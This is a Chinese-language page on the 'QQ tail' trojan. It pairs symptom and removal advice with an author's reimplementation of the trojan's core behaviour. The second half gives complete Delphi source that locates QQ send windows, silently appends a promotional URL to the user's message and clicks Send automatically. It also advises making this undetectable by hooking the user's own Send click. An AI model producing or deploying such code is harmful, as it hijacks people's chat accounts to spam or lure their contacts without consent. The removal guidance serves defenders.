病毒主要特徵
用戶系統如果沒安裝漏洞補丁或沒把IE升級到最高版本,那么訪問這些網站的時候其訪問的網頁中嵌入的惡意代碼即被運行,就會緊接著通過IE的漏洞運行一個木馬程式進駐用戶機器。然後在用戶使用QQ向好友傳送信息的時候,該木馬程式會自動在傳送的訊息末尾插入一段廣告詞,通常都是以下幾句中的一種。QQ收到信息如下:
1. HoHo~~ http://www.mm**.com剛才朋友給我發來的這個東東。你不看看就後悔喔,嘿嘿。也給你的朋友吧。2. 呵呵,其實我覺得這個網站真的不錯,你看看http://www.ktv***.com/ 3. 想不想來點搖滾粗口舞曲,中華 DJ 第一站,網址告訴你http://www.qq33**.com.。不要告訴別人 ~ 哈哈,真正算得上是國內最棒的 DJ 站點。
4. http//http://www.hudong.com/wiki/www.hao***.com 幫忙看看這個網站打不打的開。
5.http://ni***.126.com 看看啊。 我最近照的照片~ 才掃描到網上的。看看我是不是變了樣?
清除方法
1.在運行中輸入MSconfig,如果啟動項中有“sendmess.exe”和“wwwo.exe”這兩個選項,將其禁止。在C:\WINDOWS一個叫qq32.INI的檔案,檔案裡面是附在QQ後的那幾句廣告詞,將其刪除。轉到DOS下再將“Sendmess.exe”和“wwwo.exe”這兩個檔案刪除。
2.安裝系統漏洞補丁
由病毒的播方式我們知道,“QQ尾巴”這種木馬病毒是利用IE的iFrame傳播的,即使不執行病毒檔案,病毒依然可以藉由漏洞自動執行,達到感染的目的。因此應該敢快下載IE的iFrame漏洞補丁。
========================================================
“QQ尾巴”專殺工具
類型: 專殺工具
版本: 2006.2.9.21
大小: 176 KB
語言: 中文
下載地址:http://tool.duba.net/zhuansha/34.shtml
QQ尾巴病毒的傳送原理分析
近來QQ尾巴病毒大肆發作,我也是經常收到網友們發到來的帶尾巴的訊息,於是,好奇心一來,我也來研究研究此病毒的發作原理。首先,我不知道QQ尾巴病毒真正的原理,我只是猜測並且自己寫了一個類似的程式來實現它。
QQ尾巴的發作情況:當用戶打開一個QQ訊息傳送視窗時,病毒會自動往訊息文本框裡輸入文本,然後不等用戶反應過來就發出去了。
程式實現:首先要找到QQ訊息傳送視窗的句柄以及訊息文本框與“傳送”按鈕的視窗句柄。
一、 如何找到QQ訊息傳送視窗句柄:
QQ訊息傳送視窗有兩種,一種是訊息模式,在這種情況下,視窗標題含有“傳送訊息”字樣;一種是聊天模式,視窗標題含有“聊天中”字樣;
通過枚舉視窗就可找到相應的句柄:
// 取得QQ的傳送訊息視窗
function GetQQWnd: HWND;
var
hCurrentWindow: HWnd;
WndText:String;
begin
hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);
while hCurrentWindow 0 do
begin
WndText:=GetWndText(hCurrentWindow);
if (Pos('聊天中',WndText)>0) or (Pos('傳送訊息',WndText)>0) then
begin
Result:=hCurrentWindow;
Exit;
end;
hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);
end;
Result:=0;
end;
二、 如何找到“傳送”按鈕視窗句柄:
找到了QQ的傳送訊息視窗後,就可以進一步查找“傳送”按鈕句柄了,如視窗句柄為qqWnd,則可以用一個循環,查找文本中含有“傳送”字樣的視窗,經過試驗發現,“傳送”按鈕恰恰是窗體的第一個子視窗,這樣,可以用
btnWnd:=GetDlgItem(qqWnd,1); // 傳送按鈕
來獲得“傳送”按鈕的句柄。
三、 如何找到訊息文本框視窗句柄:
訊息文本框並不好找,不過你可以先在訊息文本框中輸入幾個字母,如“abcd”,這樣我們就可以用上述方法來查找了,不過通過實驗後,發現訊息文本框並不是QQ視窗的直接子視窗,而是其中一個子視窗的子視窗,通過實驗,可以用
txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框
來獲得。
四、 如何獲得原訊息文本框的文本:
要獲取原訊息文本框的文本,只需要一個API函式就行了,如下:
// 獲得視窗文本
function GetWndText(hWnd: HWND): String;
Var
Ret:LongInt;
mText:PCHAR;
Buf:Integer;
begin
Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;
GetMem(mText,Ret);
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_GETTEXT,Ret,Buf);
Result:=StrPas(mText);
finally
Freemem(mText,Ret);
end;
end;
五、 如何住原訊息文本框裡追加文本:
與取文本相反
// 傳送文本到視窗
procedure SetWndText(hWnd: HWND; Text: String);
Var
Ret:LongInt;
mText:PChar;
Buf:Integer;
begin
GetMem(mText,Length(Text));
StrCopy(mText,PChar(Text));
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_SETTEXT,0,Buf);
finally
FreeMem(mText,Length(Text));
end;
end;
六、 如果讓“傳送”按鈕自動點擊:
一切都準備好了,現在要開始傳送了,為了讓訊息自動傳送,我們可以模擬“傳送”按鈕被點擊了。
SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);
SendMessage(btnWnd,WM_LBUTTONUP,0,0);
通過模擬一個滑鼠在“開始”按鈕上的按下與放開,就實現了點擊傳送功能。
七、 其它的定時功能比較簡單,在此也不多說了。
八、 全部原始碼如下
:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls;
type
TForm1 = class(TForm)
Timer1: TTimer;
Button1: TButton;
Edit1: TEdit;
Label1: TLabel;
Button2: TButton;
procedure Timer1Timer(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
// 獲得視窗文本
function GetWndText(hWnd: HWND): String;
Var
Ret:LongInt;
mText:PChar;
Buf:Integer;
begin
Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;
GetMem(mText,Ret);
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_GETTEXT,Ret,Buf);
Result:=StrPas(mText);
finally
FreeMem(mText,Ret);
end;
end;
// 傳送文本到視窗
procedure SetWndText(hWnd: HWND; Text: String);
Var
Ret:LongInt;
mText:PChar;
Buf:Integer;
begin
GetMem(mText,Length(Text));
StrCopy(mText,PChar(Text));
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_SETTEXT,0,Buf);
finally
FreeMem(mText,Length(Text));
end;
end;
// 取得QQ的傳送訊息視窗
function GetQQWnd: HWND;
var
hCurrentWindow: HWnd;
WndText:String;
begin
hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);
while hCurrentWindow 0 do
begin
WndText:=GetWndText(hCurrentWindow);
if (Pos('聊天中',WndText)>0) or (Pos('傳送訊息',WndText)>0) then
begin
Result:=hCurrentWindow;
Exit;
end;
hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);
end;
Result:=0;
end;
// 定時處理
procedure TimerProc;
var
qqWnd,txtWnd,btnWnd:HWND;
Msg:String;
begin
qqWnd:=GetQQWnd;
if qqWnd=0 then Exit;
btnWnd:=GetDlgItem(qqWnd,1); // 傳送按鈕
txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框
if (btnWnd=0) or (txtWnd=0) then Exit;
Msg:=GetWndText(txtWnd);
Msg:=Msg+#13+#10+'歡迎光臨綠蔭網路http://www.lvyin.net';
SetWndText(txtWnd,Msg);
SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);
SendMessage(btnWnd,WM_LBUTTONUP,0,0);
end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
TimerProc;
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
Timer1.Enabled :=not Timer1.Enabled;
if Timer1.Enabled then
Button1.Caption :="停 止"
else
Button1.Caption :="開 始";
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
Timer1.Interval :=StrToInt(Edit1.Text);
end;
end.
總結:
上面只講述了QQ訊息自動傳送的主要功能,這或許跟QQ尾巴的原理不同(我也不知道),但總體上應該差不多。如果要做到讓用戶感覺不到異常,就要改一下了,不要自動傳送,而是在當用戶點擊了“傳送”按鈕後再把文本加進去。這樣的話可是攔截“傳送”按鈕的點擊訊息,然後再用上述方法把文本加進去,然後把訊息交還原程式處理。至於如何讓它成為病毒,會自我複製,自我隱藏等功能,那又是另外一個話題了,在此就不多講了。
